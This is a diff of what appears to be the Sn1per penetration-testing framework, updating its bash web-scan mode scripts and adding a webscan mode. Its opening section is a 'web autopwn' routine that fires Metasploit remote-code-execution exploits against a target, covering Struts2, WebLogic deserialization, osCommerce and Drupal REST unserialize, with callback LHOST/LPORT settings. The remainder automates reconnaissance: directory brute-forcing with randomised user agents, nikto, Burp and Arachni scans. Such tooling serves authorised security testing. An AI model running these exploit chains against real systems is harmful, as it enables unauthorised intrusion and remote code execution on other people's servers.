msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -163,7 +200,7 @@
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -171,4 +208,14 @@
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPAL REST UNSERIALIZE CVE-2019-6340 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use unix/webapp/drupal_restws_unserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw 2> /dev/null
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished web autopwn: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi

View File

@ -14,8 +14,12 @@ if [ "$MODE" = "webporthttp" ]; then
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
echo "$TARGET $MODE port$PORT `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +%Y%m%d%H%M`.txt 2>&1
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
@ -101,6 +105,7 @@ if [ "$MODE" = "webporthttp" ]; then
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 3 -I -s -R http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 -I -s -R -L http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS http://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
if [ "$WEBTECH" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
@ -122,11 +127,16 @@ if [ "$MODE" = "webporthttp" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port$PORT.jpg"
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
if [ $CUTYCAPT = "1" ]; then
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [ $WEBSCREENSHOT = "1" ]; then
cd $LOOT_DIR
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:$PORT
fi
if [ "$BURP_SCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -163,7 +173,7 @@ if [ "$MODE" = "webporthttp" ]; then
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat /usr/share/blackwidow/$TARGET*/$TARGET*.txt 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
@ -171,22 +181,43 @@ if [ "$MODE" = "webporthttp" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-common.txt
fi
fi
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-full.txt
fi
fi
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-exploits.txt
fi
fi
if [ "$DIRSEARCH" == "1" ]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
if [ "$GOBUSTER" == "1" ]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget http://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-http.txt 2> /dev/null
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -217,6 +248,7 @@ if [ "$MODE" = "webporthttp" ]; then
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt
fi
cd $INSTALL_DIR
if [ "$CLUSTERD" == "1" ]; then
@ -255,5 +287,8 @@ if [ "$MODE" = "webporthttp" ]; then
if [ "$LOOT" = "1" ]; then
loot
fi
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
exit
fi

View File

@ -14,8 +14,12 @@ if [ "$MODE" = "webporthttps" ]; then
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
echo "$TARGET $MODE port$PORT `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +%Y%m%d%H%M`.txt 2>&1
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
@ -102,6 +106,7 @@ if [ "$MODE" = "webporthttps" ]; then
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 -I -s -R https://$TARGET:$PORT | tee $LOOT_DIR/web/headers-https-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 -I -s -R -L https://$TARGET:$PORT | tee $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS https://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
if [ "$WEBTECH" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
@ -132,12 +137,17 @@ if [ "$MODE" = "webporthttps" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
if [ $CUTYCAPT = "1" ]; then
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [ $WEBSCREENSHOT = "1" ]; then
cd $LOOT_DIR
python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:$PORT
fi
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port$PORT.jpg"
if [ "$BURP_SCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
@ -173,7 +183,7 @@ if [ "$MODE" = "webporthttps" ]; then
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u https://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat /usr/share/blackwidow/$TARGET*/$TARGET*.txt 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
@ -181,22 +191,43 @@ if [ "$MODE" = "webporthttps" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-common.txt -fw -r
fi
fi
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-full.txt -fw -r
fi
fi
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-exploits.txt -fw -r
fi
fi
if [ "$DIRSEARCH" == "1" ]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [ "$GOBUSTER" == "1" ]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -226,6 +257,7 @@ if [ "$MODE" = "webporthttps" ]; then
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-port$PORT.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-https-port$PORT.txt
fi
if [ "$SHOCKER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -258,5 +290,8 @@ if [ "$MODE" = "webporthttps" ]; then
if [ "$LOOT" = "1" ]; then
loot
fi
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
exit
fi

84
modes/webscan.sh Normal file
View File

@ -0,0 +1,84 @@
if [ "$MODE" = "webscan" ]; then
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
echo -e ""
echo -e ""
echo -e " ; , "
echo -e " ,; '. "
echo -e " ;: :; "
echo -e " :: :: "
echo -e " :: :: "
echo -e " ': : "
echo -e " :. : "
echo -e " ;' :: :: ' "
echo -e " .' '; ;' '. "
echo -e " :: :; ;: :: "
echo -e " ; :;. ,;: :: "
echo -e " :; :;: ,;\" :: "
echo -e " ::. ':; ..,.; ;:' ,.;: "
echo -e " \"'\"... '::,::::: ;: .;.;\"\"' "
echo -e " '\"\"\"....;:::::;,;.;\"\"\" "
echo -e " .:::.....'\"':::::::'\",...;::::;. "
echo -e " ;:' '\"\"'\"\";.,;:::::;.'\"\"\"\"\"\" ':; "
echo -e " ::' ;::;:::;::.. :; "
echo -e " :: ,;:::::::::::;:.. :: "
echo -e " ;' ,;;:;::::::::::::::;\";.. ':."
echo -e " :: ;:\" ::::::\"\"\"':::::: \": ::"
echo -e " :. :: ::::::; ::::::: : ; "
echo -e " ; :: ::::::: ::::::: : ; "
echo -e " ' :: ::::::....:::::' ,: ' "
echo -e " ' :: :::::::::::::\" :: "
echo -e " :: ':::::::::\"' :: "
echo -e " ': \"\"\"\"\"\"\"' :: "
echo -e " :: ;: "
echo -e " ':; ;:\" "
echo -e " -hrr- '; ,;' "
echo -e " \"' '\" "
echo -e " ''''$RESET"
echo ""
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
touch $LOOT_DIR/scans/$TARGET-webscan.txt 2> /dev/null
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running webscan mode: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
if [ "$BURP_SCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}"
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}"
echo ""
fi
if [ "$ARACHNI_SCAN" == "1" ]; then
mkdir -p $LOOT_DIR/web/http-$TARGET/
mkdir -p $LOOT_DIR/web/https-$TARGET/
arachni --report-save-path=$LOOT_DIR/web/http-$TARGET/ --output-only-positives http://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-http-`date +"%Y%m%d%H%M"`.txt 2>&1
arachni --report-save-path=$LOOT_DIR/web/https-$TARGET/ --output-only-positives https://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-https-`date +"%Y%m%d%H%M"`.txt 2>&1
cd $LOOT_DIR/web/http-$TARGET/
cd $LOOT_DIR/web/https-$TARGET/
arachni_reporter $LOOT_DIR/web/http-$TARGET/*.afr --report=html:outfile=$LOOT_DIR/web/http-$TARGET/arachni.zip
arachni_reporter $LOOT_DIR/web/https-$TARGET/*.afr --report=html:outfile=$LOOT_DIR/web/https-$TARGET/arachni.zip
cd $LOOT_DIR/web/http-$TARGET/
unzip arachni.zip
cd $LOOT_DIR/web/https-$TARGET/
unzip arachni.zip
cd $INSTALL_DIR
fi
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
loot
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished webscan mode: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
exit
fi

62
sniper
View File

@ -3,7 +3,7 @@
# + -- --=[https://xerosecurity.com
#
VER="6.2"
VER="7.0"
INSTALL_DIR="/usr/share/sniper"
LOOT_DIR="$INSTALL_DIR/loot/$TARGET"
SNIPER_PRO=$INSTALL_DIR/pro.sh
@ -61,6 +61,9 @@ function help {
echo ' [*] HTTPS WEB PORT MODE'
echo ' sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>'
echo ""
